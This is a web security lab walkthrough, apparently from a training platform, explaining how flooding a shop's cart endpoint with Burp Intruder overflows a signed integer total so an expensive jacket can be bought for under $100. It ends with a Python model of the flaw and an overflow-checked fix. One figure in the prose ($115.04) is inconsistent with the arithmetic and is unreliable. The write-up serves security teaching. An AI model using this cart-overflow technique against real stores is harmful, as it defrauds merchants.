Low-level logic flaw
This lab doesn't adequately validate user input. You can exploit a logic flaw in its purchasing workflow to buy items for an unintended price. To solve the lab, buy a "Lightweight l33t leather jacket".
You can log in to your own account using the following credentials: wiener:peter
After logging in, I saw that the jacket is priced at $1337, well above my $100 store credit. To get the jacket within that budget I needed to find a flaw in the purchasing workflow. My first attempt was to tamper with the price parameter in intercepted requests, but that had no effect.
I then turned to the quantity parameter to see how the backend would handle a very large integer and what it would do to the cart total. It turned out the application only accepts quantities of at most two digits, capping each request at 99. Given that restriction, I decided to send many requests so that the quantities would accumulate to a very large number.
To execute this, I opted for the Burp Intruder tool from Burp Suite. While it may not be as swift as the Intruder in the professional release, it sufficiently met my requirements for this particular scenario. If a higher volume of requests were necessary, I could have employed the Turbo Intruder extension to expedite the process. Alternatively, a custom script, such as the one outlined below, could have been employed to achieve the desired outcome more efficiently.
Using Python
Using Burp Intruder
After configuring Burp Intruder to target the POST /cart endpoint with null payloads and an indefinite payload loop, I kept refreshing the /cart page and observed a noteworthy consequence: the total price eventually displayed as a large negative number.
This happens because the running total exceeds the maximum value of a signed integer in the backend programming language. Once that maximum is passed, the value wraps around to the smallest (most negative) integer and continues incrementing from there.
Knowing this, I planned to bring the total to somewhere between $0 and $100. With the jacket costing $1337, that cannot be done with jackets alone, since each one added from just below zero would overshoot the $100 budget. The solution was therefore to get the total as close to zero as possible from below, switch to a cheaper product, and keep sending POST requests until the total landed in the desired range.
To execute this plan, I cleared the cart and adjusted Burp Intruder's payload settings to generate 324 payloads, positioning the total at -$64060.96.
Next, I used Burp Repeater to resend the request with the quantity set to 47, the value that brings the total closest to zero without crossing the budget. Since another request with a quantity of 99 would have produced a total of $115.04, above the $100 limit, I determined that an additional 47 units was what I needed.
To achieve this, I introduced a new product with a lower cost than the jacket, priced at $83.63. Calculating the quantity needed to balance the total at zero, I determined that adding 15 units of this product would suffice. With this approach, the total price settled between $0 and $100, enabling a successful order placement and the resolution of the lab challenge.
Now I just place the order and LAB SOLVED!
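As an added example (not part of the original write-up), the following Python models the arithmetic behind the negative total and the overflow-checked version a fixed backend would use. The signed 32-bit total, the cent-based prices, and the function names are assumptions; the prices and quantities are the ones from the walkthrough above.

```python
# Added example: emulates the integer wrap-around behind this lab's cart total,
# then shows the overflow-checked arithmetic that closes the flaw.
# Prices are the lab's (jacket $1337.00, cheaper item $83.63); the 32-bit
# signed total and the hardened checks are assumptions, not the lab's code.

INT32_MAX = 2**31 - 1

def wrap_int32(value: int) -> int:
    """Mimic a backend that keeps the cart total in a signed 32-bit int."""
    return (value + 2**31) % 2**32 - 2**31

def vulnerable_total_cents(lines):
    """Per-request quantity is capped at 99, but the running total is never checked."""
    total = 0
    for unit_cents, qty in lines:
        if not 1 <= qty <= 99:
            raise ValueError("quantity must be 1-99")  # the only validation performed
        total = wrap_int32(total + unit_cents * qty)   # silently wraps past INT32_MAX
    return total

def hardened_total_cents(lines, max_total_cents=INT32_MAX):
    """Same cart, but every addition is overflow-checked against a ceiling."""
    total = 0
    for unit_cents, qty in lines:
        if not 1 <= qty <= 99:
            raise ValueError("quantity must be 1-99")
        line_total = unit_cents * qty
        # Check before adding: total + line_total must not exceed the ceiling
        if line_total > max_total_cents - total:
            raise OverflowError("cart total would exceed the allowed maximum")
        total += line_total
    return total

JACKET_CENTS = 133700  # "Lightweight l33t leather jacket", $1337.00
CHEAP_CENTS = 8363     # the cheaper product used at the end, $83.63

def walkthrough_cart():
    """The sequence of POST /cart additions described above (constructed)."""
    return [(JACKET_CENTS, 99)] * 324 + [(JACKET_CENTS, 47), (CHEAP_CENTS, 15)]

if __name__ == "__main__":
    cart = walkthrough_cart()
    print("vulnerable total: $%.2f" % (vulnerable_total_cents(cart) / 100))  # prints $32.49
    try:
        hardened_total_cents(cart)
    except OverflowError as err:
        print("hardened backend rejected the cart:", err)
```

The 324 requests of 99 jackets alone wrap the total to -$64060.96, matching the value seen in Burp; the hardened version refuses the cart long before that point.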